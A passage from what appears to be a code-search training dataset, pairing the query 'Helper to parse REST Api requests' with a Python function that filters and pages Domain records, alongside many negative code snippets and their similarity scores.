updateRecords\n ut = rsrc_defn.ResourceDefinition(instance.name,\n instance.type(),\n uprops)\n instance.state_set(instance.CREATE, instance.COMPLETE)\n scheduler.TaskRunner(instance.update, ut)()\n self.assertEqual((instance.UPDATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def update_company(cls, **kwargs):\n return cls._do_call(\n 'PUT', cls.api_endpoint + 'companies', params=kwargs)", "def domains(self, domains):\n\n self._domains = domains", "def update(name, location, visibility, new_name, tenant_name, client, logger):\n utils.explicit_tenant_name_message(tenant_name, logger)\n validate_visibility(visibility)\n graceful_msg = 'Requested site with name `{0}` was not found'.format(name)\n with handle_client_error(404, graceful_msg, logger):\n client.sites.update(name, location, visibility, new_name)\n logger.info('Site `{0}` updated'.format(name))", "def update_host(self, conf, tenant_id, network_id, host_id, body):\n\t\tpass", "def setDomainRange(self, domain, range):\n self.domain = domain.cloneSpace()\n self.range = range.cloneSpace()\n return", "def update(self):\n record_obj = dict(\n record_id=self.record_id,\n type=self.type,\n ttl=self.ttl,\n priority=self.priority,\n rdata=self.rdata,\n )\n resp = self.call(method='updateZoneRecord',\n args=[self.domainname, self.subdomain, record_obj])\n return resp", "async def update_organization(request: Request, org: str, data: dict):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n if org not in organizations_obj:\n logger.warning(\"Organization %s not found.\", org)\n raise HTTPException(\n status_code=404, detail=\"Organization {} not found.\".format(org))\n organizations_obj[org] = data[\"organization_data\"]\n await redis.set_key(\"influxdb_organizations\", orjson.dumps(organizations_obj))\n logger.info(\"Organization %s updated\", org)\n return {\"message\": \"Organization {} updated\".format(org)}", "def setup_domain(domain):\n bucket = BUCKET_MANAGER.get_bucket(domain)\n\n zone = DOMAIN_MANAGER.find_hosted_zone(domain) \\\n or DOMAIN_MANAGER.create_hosted_zone(domain)\n\n endpoint = util.get_endpoint(BUCKET_MANAGER.get_region_name(bucket))\n a_record = DOMAIN_MANAGER.create_s3_domain_record(zone, domain, endpoint)\n print(\"Domain configure: http://{}\".format(domain))\n print(\"A record created: {}\".format(a_record))", "def set_nfs_domain(session, domain, return_type=None, **kwargs):\n body_values = {'domain': domain}\n\n path = '/api/settings/nfs_domain.json'\n\n return session.post_api(path=path, body=body_values,\n return_type=return_type, **kwargs)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def test_updateContact(self):\n response = self.client.get(self.url)\n qs = response.json()\n contact = qs[0]\n to_update_value = 'address 2'\n contact['address'] = to_update_value\n response = self.client.put(self.url + str(contact['id']) + '/', contact, content_type=\"application/json\")\n self.assertEqual(response.status_code, 200)\n contact2 = response.json()\n self.assertEqual(contact2['address'], to_update_value)", "def set_axis_domain(self, axis_id, domain):\n\n assert axis_id in self.axes_domains\n\n if axis_id is not None:\n logger.debug('setting domain of axis %s with %s', str(axis_id),\n str(domain))\n if len(domain) != self.data.shape[axis_id]:\n raise Exception('length of domain values (%d) does not '\n ' match length of data (%d) for axis %s'\n % (len(domain), self.data.shape[axis_id],\n self.get_axis_name(axis_id)))\n self.axes_domains[axis_id] = np.array(domain)", "def update(self, cookies):\n self._update(cookies, domain=None, path=None)", "def test_delete_email_domain(self):\n email_dom = 'delete.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertTrue(domain.delete(email_dom))", "def update(self, **kwargs):\n\n host = self.get()\n if not host:\n self.raiseNotFoundError()\n return host.update(**kwargs)", "def replace(self, domain, sequence):\n index = self._remove_sequence(domain)\n self._add_sequence(index, sequence)", "def updpt():\n try:\n appuser, _ = util.authenticate()\n fields = [\"dsId\", \"dsType\", \"modified\", \"editors\", \"srctl\", \"source\",\n \"date\", \"text\", \"refs\", \"qtype\", \"communities\", \"regions\",\n \"categories\", \"tags\", \"srclang\", \"translations\", \"stats\"]\n ptdat = util.set_fields_from_reqargs(fields, {})\n dbpt = verify_edit_authorization(appuser, ptdat)\n if dbpt:\n dbst = dbpt.get(\"srctl\")\n if dbst and (dbst != ptdat.get(\"srctl\")):\n raise ValueError(\"Source Timeline may not be changed.\")\n util.fill_missing_fields(fields, dbpt, ptdat)\n else: # making a new instance\n for fld in [\"srctl\", \"date\", \"text\"]:\n if not ptdat.get(fld): # required point field value\n raise ValueError(\"Point \" + fld + \" value is required.\")\n # date format validity checking is done client side\n remove_html_from_point_fields(ptdat)\n ptdat[\"lmuid\"] = appuser[\"dsId\"]\n pt = dbacc.write_entity(ptdat, ptdat.get(\"modified\", \"\"))\n except ValueError as e:\n return util.serve_value_error(e)\n return util.respJSON(pt)", "def _sync_domain(self, domain, new_domain_flag=False):\n LOG.debug('Synchronising Domain: %s' % domain['id'])\n\n servers = self.central_service.find_servers(self.admin_context)\n\n recordsets = self.central_service.find_recordsets(\n self.admin_context, {'domain_id': domain['id']})\n\n records = []\n\n for recordset in recordsets:\n criterion = {\n 'domain_id': domain['id'],\n 'recordset_id': recordset['id']\n }\n\n raw_records = self.central_service.find_records(\n self.admin_context, criterion)\n\n for record in raw_records:\n records.append({\n 'name': recordset['name'],\n 'type': recordset['type'],\n 'ttl': recordset['ttl'],\n 'priority': record['priority'],\n 'data': record['data'],\n })\n\n output_folder = os.path.join(os.path.abspath(cfg.CONF.state_path),\n 'bind9')\n\n output_path = os.path.join(output_folder, '%s.zone' %\n \"_\".join([domain['name'], domain['id']]))\n\n utils.render_template_to_file('bind9-zone.jinja2',\n output_path,\n servers=servers,\n domain=domain,\n records=records)\n\n rndc_call = self._rndc_base()\n\n if new_domain_flag:\n rndc_op = [\n 'addzone',\n '%s { type master; file \"%s\"; };' % (domain['name'],\n output_path),\n ]\n rndc_call.extend(rndc_op)\n else:\n rndc_op = 'reload'\n rndc_call.extend([rndc_op])\n rndc_call.extend([domain['name']])\n\n LOG.debug('Calling RNDC with: %s' % \" \".join(rndc_call))\n utils.execute(*rndc_call)\n\n nzf_name = glob.glob('%s/*.nzf' % cfg.CONF[self.name].nzf_path)\n\n output_file = os.path.join(output_folder, 'zones.config')\n\n shutil.copyfile(nzf_name[0], output_file)", "def domain_command():\n # 1. Get input host from Demisto\n domain = demisto.args().get('domain')\n # 2. Get the host reputation from SlashNext API\n response = domain_lookup(domain=domain)\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n dbot_score_cont, domain_cont = get_dbot_std_context(\n domain, 'Domain', response.get('threatData').get('verdict'), response.get('threatData').get('threatType'))\n\n snx_ioc_cont = get_snx_host_ioc_context(domain, 'Domain', response.get('threatData'))\n\n ec = {\n 'SlashNext.Domain(val.Value === obj.Value)': snx_ioc_cont,\n 'DBotScore': dbot_score_cont,\n 'Domain': domain_cont\n }\n\n domain = domain.encode('idna')\n\n title = 'SlashNext Phishing Incident Response - Domain Lookup\\n' \\\n '##### domain = {}'.format(domain.decode())\n\n md = tableToMarkdown(\n title,\n snx_ioc_cont,\n ['Value',\n 'Type',\n 'Verdict',\n 'ThreatStatus',\n 'ThreatName',\n 'ThreatType',\n 'FirstSeen',\n 'LastSeen']\n )\n\n return_outputs(md, ec, snx_ioc_cont)" ]
[ "0.7216133", "0.6992674", "0.69599164", "0.6770144", "0.6691671", "0.6631902", "0.66250306", "0.66209924", "0.6600841", "0.65592813", "0.6530738", "0.65130335", "0.6412239", "0.63919693", "0.63866", "0.6360199", "0.6326602", "0.6326602", "0.63022065", "0.6297731", "0.62386405", "0.62386405", "0.61449534", "0.6136164", "0.6086499", "0.6071909", "0.60690707", "0.60583305", "0.60529774", "0.5997694", "0.5984268", "0.5932513", "0.58942485", "0.58505356", "0.5827994", "0.5824701", "0.5771238", "0.5711579", "0.5702976", "0.56488836", "0.563843", "0.5634274", "0.5633698", "0.5633692", "0.56034106", "0.5600067", "0.5564031", "0.5545289", "0.5544413", "0.5518701", "0.5506365", "0.5499301", "0.5481803", "0.54809284", "0.5480885", "0.5479211", "0.5471982", "0.546999", "0.54531664", "0.54449815", "0.54416597", "0.5427975", "0.5405719", "0.5403485", "0.5395135", "0.53715026", "0.53544825", "0.532646", "0.53215456", "0.531863", "0.53147995", "0.5311568", "0.52971745", "0.52846295", "0.52830845", "0.52821213", "0.52788365", "0.5275867", "0.52699816", "0.5268582", "0.526732", "0.5263039", "0.5251198", "0.5236147", "0.52318805", "0.52309597", "0.52281725", "0.5225839", "0.5223581", "0.5222234", "0.52195996", "0.5213422", "0.5207288", "0.52052873", "0.5194012", "0.518894", "0.5188412", "0.51849335", "0.51753587", "0.5165281" ]
0.77741724
0
Helper to parse REST Api requests
def render(args): query = database.session_query(Domain) filt = args.pop("filter") certificate_id = args.pop("certificate_id", None) if filt: terms = filt.split(";") query = database.filter(query, Domain, terms) if certificate_id: query = query.join(Certificate, Domain.certificates) query = query.filter(Certificate.id == certificate_id) return database.sort_and_page(query, Domain, args)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse (self, request):\n\n data = {}\n body_start = request.find('\\r\\n\\r\\n')\n if body_start == -1:\n data['body'] = None\n else:\n data['body'] = request[body_start+4:]\n parts = request.split(' ', 2)\n data['method'] = parts[0]\n data['resource'] = parts[1]\n return (data)", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def handle_rest_api(request, response):\n url_fragments = urlparse.urlparse(request.url)\n query_options = urlparse.parse_qs(url_fragments.query)\n api_endpoint = url_fragments.path.rsplit('/', 2)[1]\n\n # Use API endpoint to load reference JSON data\n with open(os.path.join(HERE, 'data', '%s.json' % api_endpoint), 'r') as f:\n data = json.loads(f.read())\n\n def do_filter(entry):\n result = True\n\n for option, values in query_options.iteritems():\n # Don't handle options which are not properties of the entry\n if option not in entry:\n continue\n\n for value in values:\n if isinstance(entry[option], int):\n result &= entry[option] == int(value)\n else:\n result &= entry[option] == value\n\n return result\n\n if api_endpoint == 'jobs':\n data['results'] = filter(do_filter, data['results'])\n\n elif api_endpoint == 'job-log-url':\n data = filter(do_filter, data)\n\n return data", "def process_request(self, req, resp, resource, params):", "def parse_request(req):\n # Parsing out the request body\n data = req.get_json()\n if (data is None or\n 'action' not in data or\n 'task_id' not in data or\n 'release_id' not in data):\n abort(400)\n \n action = data['action']\n task = data['task_id']\n release = data['release_id']\n return action, task, release", "def __apiRequest(self, url, parms={}):\n authparms = self.__addAuthParms(parms);\n request = self.http.request('GET', url, fields=authparms)\n if request.status != 200:\n raise ApiCommunicationError('Failed to retrieve data from Marvel, HTTP Status {}'.format(request.status))\n else:\n return json.loads( request.data.decode('utf-8') )", "def parse_api(self, soup):\n return {}", "def parse_request(request):\n request_split = request.split()\n method = request_split[0]\n uri = request_split[1]\n protocol = request_split[2]\n print(\"Protocol: \" + protocol)\n headers = request_split[3]\n\n if method != \"GET\":\n raise RequestError(405, \"Method Not Allowed\")\n elif protocol != \"HTTP/1.1\":\n raise RequestError(505, \"HTTP Version Not Supported\")\n elif \"Host:\" not in headers:\n raise RequestError(400, \"Bad Request\")\n else:\n return uri", "def __call_api(self, values):\n # Add auth key to the request dictionary if not supplie\n if 'auth' not in values:\n values['auth'] = self.auth_data['auth']\n\n # Encode the data for a GET request\n data = urllib.parse.urlencode(values)\n\n #print values\n\n # Try to make the request\n xml_string = urllib.request.urlopen(self.xml_rpc + '?' + data).read()\n\n # Parse the XML\n response_data = xmltodict(self.__sanitize(xml_string))\n\n # Ensure that there was XML to parse\n if not response_data:\n return None\n\n # Grab the root element\n response_data = response_data['root'][0]['child']\n\n return response_data", "def parse(self, response):", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def parse_request(self, request):\n response=''\n http_code = 200\n\n request_line = request.splitlines()[0]\n request_method, path, request_version = request_line.split()\n\n #Try to split path into it's components: the operation requested and the keyvalue\n try:\n request_op, request_keyvalue = path.split('?')\n request_op = request_op[1:]\n\n #If request is a get we split in a different order than if it's a set\n if request_op == 'get':\n request_value, request_key = request_keyvalue.split('=')\n response, http_code = self.get_value(request_key)\n elif request_op == 'set':\n request_key, request_value = request_keyvalue.split('=')\n response, http_code = self.set_value(request_key, request_value)\n else:\n response = 'Unknown operation in URL. Must be either GET or SET.'\n http_code = 400\n\n except ValueError: #Catch any paths that don't match the form we're interested in\n response = dedent(\"\"\"Incorrect path (%s)\n Requested URL must take the form http://%s:%s/[operation]?[value]\"\"\" % (path, self.server_address, self.server_port))\n http_code = 400\n return response, http_code\n\n return response, http_code", "def _parser(self, request, *args, **kwargs):\n\n self.request = request\n\n # parse header\n self.header = {k[5:]: v for k, v in request.META.items() if k.startswith('HTTP_')}\n self.header['CONTENT_TYPE'] = request.META.get('CONTENT_TYPE')\n\n # parse boby\n if request.method not in ['GET', 'HEAD']:\n\n # TODO: serve other body format\n if 'multipart/form-data' in self.header['CONTENT_TYPE']:\n self.body = request.POST.dict()\n\n else:\n # default: application/json\n if self.request.body:\n try:\n self.body = json.loads(self.request.body)\n except Exception as e:\n raise Exception('parse json body error')\n \n # parse query\n self.query = request.GET.dict()\n\n # parse cookie\n self.cookie = {k: v for k, v in request.COOKIES.items()}", "def _parse_response(self, response, all_ops):\n try:\n parsed_response = json.loads(response)\n except Exception, e:\n raise ApiError(e)\n if 'error' in parsed_response: # needed anymore?\n raise ApiError(parsed_response['error'])\n # Return the true API return value.\n return parsed_response", "def rest(method, path, context, body=None):\n\n headers = {\n \"Accept\": \"*/*\",\n \"Content-Type\": \"application/json; charset=utf-8\",\n }\n domain = context['headers']['domain']\n auth = get_auth(context)\n url = get_url(domain, path)\n\n response = requests.request(method, url, headers=headers, json=body, auth=auth)\n\n if response.status_code >= 400:\n raise Exception(\"Error: \", response.text)\n\n return json.loads(response.text)", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def get(self):\r\n request = http.Request('GET', self.get_url())\r\n\r\n return request, parsers.parse_json", "def parse(self, request):\n result = {}\n if request.method.lower() == 'post':\n params = request.get_json(\n cache=False) if request.mimetype == 'application/json' else request.form\n else:\n params = request.args\n for arg in self.args:\n if arg.name in params:\n if arg.type is not None and type(params[arg.name]) != arg.type:\n try:\n result[arg.name] = arg.coerce(params[arg.name])\n except Exception as err:\n current_app.logger.warning('Coercion failed for param: {}'.format(arg.name))\n raise ApiError('Coercion failed for param: {}'.format(arg.name), 'ArgsParserException', 1, status_code=400)\n abort(400)\n else:\n result[arg.name] = params[arg.name]\n elif arg.required:\n current_app.logger.warning(\"Missing required param: {}\".format(arg.name))\n raise ApiError('Missing required param: {}'.format(arg.name), 'ArgsParserException', 2, status_code=400)\n abort(400)\n else:\n result[arg.name] = arg.default\n return result", "def func_PARSE(self):\n self.parsed_url = parse.urlparse(\"http://{0}:{1}{2}\".format(args.HTTP_HOST, args.HTTP_PORT, self.path).lower())\n self.parsed_param = parse.parse_qs(self.parsed_url[4])", "def normalize_api_url(self):\n def tester(self, api_url):\n \"\"\"\n Attempts to fetch general information about the MediaWiki instance\n in order to test whether *api_url* will return JSON.\n \"\"\"\n data = self._fetch_http(api_url, {'action': 'query',\n 'meta': 'siteinfo'})\n try:\n data_json = json.loads(data)\n return (data, data_json)\n except ValueError:\n return (data, None)\n\n data, data_json = tester(self, self._api_url)\n if data_json:\n return self._api_url\n else:\n # if there's an index.php in the URL, we might find the API\n if 'index.php' in self._api_url:\n test_api_url = self._api_url.split('index.php')[0] + 'api.php'\n print test_api_url\n test_data, test_data_json = tester(self, test_api_url)\n print (test_data, test_data_json)\n if test_data_json:\n self._api_url = test_api_url\n return self._api_url\n return None", "def _parse_request(self):\n if len(self.request.body) > 0:\n try:\n return tornado.escape.json_decode(self.request.body)\n except Exception:\n #Not Json, Using Form data\n return self.request.arguments\n else:\n return self.request.arguments", "def _api_request(self, endpoint, params=None):\n \n if params:\n response = requests.get(url=f\"{self.api_url}/{endpoint}\", headers={\"Authorization\":self.auth_header},\n params=params)\n else:\n response = requests.get(url=f\"{self.api_url}/{endpoint}\", headers={\"Authorization\":self.auth_header})\n code = response.status_code\n if 200 <= code < 300:\n logging.debug(f\"API call: {self.api_url}/{endpoint} | {code}\")\n encoding = response.encoding\n raw = response.content\n return json.loads(raw.decode(encoding))\n elif code > 500:\n raise APIAuthException\n else:\n logging.error(f\"ERROR: Bad API call: {self.api_url}/{endpoint} | {code}\")", "def api_root(request, format=None):\n return Response({\n 'judges' : reverse('user-list',request=request),\n 'pilots': reverse('pilot-list', request=request),\n 'marks': reverse('mark-list', request=request),\n 'results' : reverse('results-detail', request=request),\n })", "def api_convert():\n try:\n rest_data = request.get_json()\n text = rest_data.get('text')\n return jsonify({'text': process_text(text)})\n except Exception as e:\n response = jsonify({'error': 'API error'})\n response.status_code = 400\n return response", "def parse_request(request):\n\n method, path, version = request.split(\"\\r\\n\")[0].split(\" \")\n if method != \"GET\":\n raise NotImplementedError\n return path", "def parse_response(self):\n pass", "def _make_request(self):\n response = urllib2.urlopen(\n url=self.api_url,\n data=self._get_request_data()\n )\n content = response.read()\n return json.loads(content.decode('utf8'))", "def request_endpoints(self):\n\n endpoints_url = self.std[\"api\"]\n endpoints_paramd = {\n \"access_token\": self.std[\"access_token\"]\n }\n\n endpoints_response = requests.get(url=endpoints_url, params=endpoints_paramd)\n print endpoints_response\n self.endpointd = endpoints_response.json()[0]", "def _api_call(self, **kwargs):\n params = {\n 'format': 'json',\n }\n params.update(kwargs)\n r = requests.get(self.api_base_url, params=params)\n return r.json()", "def api():\n try:\n data = json.loads(request.data)\n except:\n return jsonify({\"jsonrpc\": \"2.0\", \"error\": {\"code\": -32700, \"message\": \"Parse error\"}, \"id\": None}), 500\n return jsonify(hwi.jsonrpc(data))", "def api_root(request, format=None):\n return Response({\n 'users': reverse('user-list', request=request),\n 'tweets': reverse('tweet-list', request=request),\n })", "def parse_request(self, request):\n request.process_inputs()", "def parse_response(self, response: Any) -> Any:\n return response", "async def _api_request(self,\n method: str,\n path_url: str,\n params: Dict[str, Any] = {}) -> Dict[str, Any]:\n base_url = f\"https://{global_config_map['gateway_api_host'].value}:\" \\\n f\"{global_config_map['gateway_api_port'].value}\"\n url = f\"{base_url}/{path_url}\"\n client = await self._http_client()\n if method == \"get\":\n if len(params) > 0:\n response = await client.get(url, params=params)\n else:\n response = await client.get(url)\n elif method == \"post\":\n response = await client.post(url, data=params)\n\n parsed_response = json.loads(await response.text())\n if response.status != 200:\n err_msg = \"\"\n if \"error\" in parsed_response:\n err_msg = f\" Message: {parsed_response['error']}\"\n raise IOError(f\"Error fetching data from {url}. HTTP status is {response.status}.{err_msg}\")\n if \"error\" in parsed_response:\n raise Exception(f\"Error: {parsed_response['error']}\")\n\n return parsed_response", "def __request(self,endpoint):\n apiRequest = requests.get(\"%s/%s\" % (self.baseurl,endpoint), \n auth=requests.auth.HTTPBasicAuth(self.api_id, self.api_secret))\n try:\n json = apiRequest.json()\n return json\n except JSONDecodeError:\n print(\"Failed to download or failed to parse JSON.\")\n print(apiRequest)\n return None", "def run_rest_api(num_from,num_to,server):\n if not server.endswith('/'):\n server += '/'\n rest_full_url = server+'rest/prod/range/'\n if num_from and num_to:\n rest_full_url += f'?from={num_from}&to={num_to}'\n try:\n response = requests.get(rest_full_url)\n results = response.json()\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n return results", "def api_root(request, format=None):\n\n return Response({\n 'entities': reverse('entity-list', request=request),\n 'budgets': reverse('budget-list', request=request),\n 'actuals': reverse('actual-list', request=request),\n })", "def test_get_api_resources(self):\n pass", "def api_root(request, format=None):\n return Response({\n 'users': reverse('user-list', request=request),\n 'groups': reverse('group-list', request=request),\n 'pools': reverse('pool-list', request=request),\n })", "def parse_http_request(source_addr, http_raw_data):\n r1 = http_raw_data.split('\\n')[0]\n method = r1.split()[0]\n path = r1.split()[1]\n if path == \"/\":\n r2 = http_raw_data.split('\\n')[1]\n host = r2.split()[0]\n if host == \"Host:\":\n host = re.sub(\"[:]\", \"\", host)\n r3 = r2.split(':')\n url = r2.split()[1]\n headers = []\n r3 = ' '.join(r3).replace('\\r', '').split()\n headers.append(r3)\n headers.append(url)\n headers\n requested_host = headers[0:]\n requested_path = path\n portno = re.findall(r'[0-9]+', r2)\n if portno == []:\n portno = \"80\"\n requested_port = portno\n requested_host = url\n print(\"*\" * 50)\n print(\"[parse_http_request] Implement me!\")\n print(\"*\" * 50)\n # Replace this line with the correct values.\n request_info = HttpRequestInfo(source_addr, method, requested_host, requested_port, requested_path, headers)\n return request_info", "def _api_request(date: str, api_url: str) -> Dict[str, str]:\n try:\n data = json.loads(urlopen(\n Request(f\"{api_url}?at={quote(date)}\")\n ).read().decode('utf-8'))\n except HTTPError as e:\n data = json.loads(e.file.read().decode('utf-8'))\n if \"message\" in data:\n raise ValidationError(data[\"message\"])\n else:\n raise ValidationError(f\"Service unavailable ({e}\")\n return data", "def _parse_content(response):\n if response.status_code != 200:\n raise ApiError(f'unknown error: {response.content.decode()}')\n result = json.loads(response.content)\n if not result['ok']:\n raise ApiError(f'{result[\"error\"]}: {result.get(\"detail\")}')\n return result", "def _process_request(self, request, response):\n ...", "def api_root(request, format=None):\n\n return Response(OrderedDict([\n #('class', reverse(\"class-list\", request=request, format=format)),\n ]))", "def getJsonFromApi(urlAPI: AnyStr) -> Any:\n\n if validaURL(urlAPI):\n return requestToApi(urlAPI)\n else:\n print(f\"La url \\\"{urlAPI}\\\" no es válida.\")\n return None", "def dispatchRequest (self, base_path=\"\", path_info=\"/\", params={}, request_method = \"GET\", post_data = None, accepts = \"\"): \n response_code = \"200 OK\"\n host = base_path\n request = None\n content_types = {\n 'application/vnd.google-earth.kml+xml': 'KML',\n 'application/json': 'GeoJSON',\n 'text/javascript': 'GeoJSON',\n 'application/rss+xml': 'GeoRSS',\n 'text/html': 'HTML',\n 'osm': 'OSM',\n 'gml': 'WFS',\n 'wfs': 'WFS',\n 'kml': 'KML',\n 'json': 'GeoJSON',\n 'georss': 'GeoRSS',\n 'atom': 'GeoRSS',\n 'html': 'HTML',\n 'geojson':'GeoJSON'\n } \n \n path = path_info.split(\"/\")\n \n found = False\n \n format = \"\"\n \n if params.has_key(\"format\"):\n format = params['format']\n if format.lower() in content_types:\n format = content_types[format.lower()]\n found = True\n \n if not found and len(path) > 1:\n path_pieces = path[-1].split(\".\")\n if len(path_pieces) > 1:\n format = path_pieces[-1]\n if format.lower() in content_types:\n format = content_types[format.lower()]\n found = True\n \n if not found and accepts:\n if accepts.lower() in content_types:\n format = content_types[accepts.lower()]\n found = True\n \n if not found and not format:\n if self.metadata.has_key(\"default_service\"):\n format = self.metadata['default_service']\n else: \n format = \"GeoJSON\"\n \n service_module = __import__(\"Service.%s\" % format, globals(), locals(), format)\n service = getattr(service_module, format)\n request = service(self)\n \n response = []\n \n request.parse(params, path_info, host, post_data, request_method)\n \n # short circuit datasource where the first action is a metadata request. \n if len(request.actions) and request.actions[0].method == \"metadata\": \n return request.encode_metadata(request.actions[0])\n \n datasource = self.datasources[request.datasource] \n \n if request_method != \"GET\" and hasattr(datasource, 'processes'):\n raise Exception(\"You can't post data to a processed layer.\") \n\n \n datasource.begin()\n try:\n for action in request.actions:\n method = getattr(datasource, action.method)\n result = method(action)\n response += result \n datasource.commit()\n except:\n datasource.rollback()\n raise\n \n if hasattr(datasource, 'processes'):\n for process in datasource.processes.split(\",\"):\n if not self.processes.has_key(process): \n raise Exception(\"Process %s configured incorrectly. Possible processes: \\n\\n%s\" % (process, \",\".join(self.processes.keys() ))) \n response = self.processes[process].dispatch(features=response, params=params)\n\n mime, data = request.encode(response)\n data = data.encode(\"utf-8\") \n return (mime, data)", "def rest_api_request_handler(self, request_type):\n result = {}\n success_code = 0\n with self.resource_lock:\n if request_type == self.RestRequest.REST_MUTS:\n result = self.muts # Returns MUTs\n elif request_type == self.RestRequest.REST_TEST_SPEC:\n result = self.test_spec # Returns Test Specification\n elif request_type == self.RestRequest.REST_TEST_RESULTS:\n pass # Returns test results\n else:\n success_code = -1\n return json.dumps(self.get_rest_result_template(result, 'request/' + request_type, success_code), indent=4)", "def api_root(request, format=None):\n return Response({\n 'actions': reverse('actions', request=request, format=format),\n 'assets': reverse('assets', request=request, format=format),\n 'cvi': reverse('cvi', request=request, format=format),\n 'devices': reverse('devices', request=request, format=format),\n 'functions': reverse('functions', request=request, format=format),\n 'groups': reverse('groups', request=request, format=format),\n 'impacts': reverse('impacts', request=request, format=format),\n 'missions': reverse('missions', request=request, format=format),\n 'network': reverse('network', request=request, format=format),\n 'risk-appetite': reverse('risk-appetite', request=request, format=format),\n 'threats': reverse('threats', request=request, format=format),\n 'vulnerabilities': reverse('vulnerabilities', request=request, format=format)\n })", "def api_root():\n\treturn jsonify({\n\t\t\"/\": ['GET'],\n\t\t\"/status\": ['GET'],\n\t\t\"/refresh\": ['GET'],\n\t\t\"/credit\": ['GET', 'PUT', 'PATCH'],\n\t\t\"/items\": ['GET', 'POST'],\n\t\t\"/items/<string:name>\": ['GET', 'PUT', 'PATCH', 'DELETE'],\n\t\t\"/items/<string:name>/price\": ['GET'],\n\t\t\"/channels\": ['GET', 'POST'],\n\t\t\"/channels/<int:channel>\": ['GET', 'PUT', 'PATCH', 'DELETE'],\n\t\t\"/channels/<int:channel>/price\": ['GET'],\n\t\t\"/channels/<int:channel>/vend\": ['POST'],\n\t\t\"/vend\": ['POST'],\n\t})", "async def rest_handler(request):\n # verify the request\n valid, reason = await verify_rest_request(request)\n if not valid:\n return generate_error(reason, 400)\n json = await request.json()\n # get the parameters\n cmd = json['cmd']\n params = json['params']\n # pass off to the correct target handler\n if cmd == 'find':\n response = await _find_handler(request, params)\n elif cmd == 'stats':\n response = await _stats_handler(request, params)\n elif cmd == 'download':\n response = await _download_handler(request, params)\n elif cmd == 'upload':\n response = await _upload_handler(request, params)\n elif cmd == 'provision':\n response = await _provision_handler(request, params)\n # return the response we get back fgrom the handler\n return response", "def _parse_api_base_data (self, netflix_page_data):\n api_data = {};\n important_fields = [\n 'API_BASE_URL',\n 'API_ROOT',\n 'BUILD_IDENTIFIER',\n 'ICHNAEA_ROOT'\n ]\n\n # values are accessible via dict (sloppy parsing successfull)\n if type(netflix_page_data) == dict:\n for important_field in important_fields:\n api_data.update({important_field: netflix_page_data.get(important_field, '')})\n return api_data\n\n for item in netflix_page_data:\n if 'serverDefs' in dict(item).keys():\n for important_field in important_fields:\n api_data.update({important_field: item['serverDefs']['data'][important_field]})\n return api_data", "def test_request_root(self):\n response = requests.get(self.url + '/')\n\n self.assertEqual(response.status_code, 200)\n\n json = response.json()\n self.assertIsInstance(json, dict)\n self.assertEqual(len(json.keys()), 2)\n self.assertIn('users', json.keys())\n self.assertIn('groups', json.keys())\n\n users = json.get('users')\n groups = json.get('groups')\n self.assertIsInstance(users, list)\n self.assertIsInstance(groups, list)\n self.assertEqual(len(users), 2)\n self.assertEqual(len(groups), 3)\n self.assertIn('John', users)\n self.assertIn('Jane', users)\n self.assertIn('Human', groups)\n self.assertIn('Male', groups)\n self.assertIn('Female', groups)", "def parseRequest(req):\n\treqHeaders = {}\n\treqLine = ''\n\tlineNum = 0\n\n\tfor line in req.splitlines():\n\t\tif line == '':\n\t\t\tbreak\n\t\telif lineNum == 0:\n\t\t\treqLine = line\n\t\t\tlineNum = 1\n\t\telse:\n\t\t\tsplitLine = line.split(' ', 1)\n\t\t\treqHeaders[splitLine[0]] = splitLine[1]\n\n\tsplitReqLine = reqLine.split(' ')\n\tmethod = splitReqLine[0]\n\tpath = splitReqLine[1]\n\tversion = splitReqLine[2]\n\n\treturn method, path, version, reqHeaders", "def _get_request(url_root,api_key,path,response_type,params, ssl_verify):\n url = _url_builder(url_root,api_key,path,params)\n content = _fetch(url, ssl_verify)\n response = _dispatch(response_type)(content)\n return response", "def probe_api():\n\n info = loads(get(url).text)\n return info", "def apicall():\r\n# try:\r\n print request.get_json()\r\n test_json = request.get_json()\r\n logger.info(\"input json object loaded\")\r\n logger.info(test_json)\r\n k=MetaData(test_json)\r\n int_res=k.getData()\r\n print '------------------------------'\r\n print int_res\r\n return jsonify(int_res)", "def api_root(request, format=None):\n # Buffer\n buff = OrderedDict()\n # Collection\n collection = buff.setdefault('collection', OrderedDict())\n collection['version'] = '1.0'\n collection['href'] = reverse(\n 'api-root', request=request, format=format)\n # Items\n items = collection.setdefault('items', OrderedDict())\n # Accounts\n accounts = items.setdefault('accounts', OrderedDict())\n a_acct = accounts.setdefault('answers', OrderedDict())\n a_acct['href'] = reverse('answer-list', request=request, format=format)\n a_acct.update(media_type_factory(act_views.AnswerList))\n q_acct = accounts.setdefault('questions', OrderedDict())\n q_acct['href'] = reverse('question-list', request=request, format=format)\n q_acct.update(media_type_factory(act_views.QuestionList))\n u_acct = accounts.setdefault('users', OrderedDict())\n u_acct['href'] = reverse('user-list', request=request, format=format)\n u_acct.update(media_type_factory(act_views.UserList))\n in_acct = accounts.setdefault('login', OrderedDict())\n in_acct['href'] = reverse('login', request=request, format=format)\n in_acct.update(media_type_factory(act_views.LoginView))\n out_acct = accounts.setdefault('logout', OrderedDict())\n out_acct['href'] = reverse('logout', request=request, format=format)\n out_acct.update(media_type_factory(act_views.LogoutView))\n ## g_acct = accounts.setdefault('user_groups', OrderedDict())\n ## g_acct['href'] = reverse('group-list', request=request, format=format)\n ## 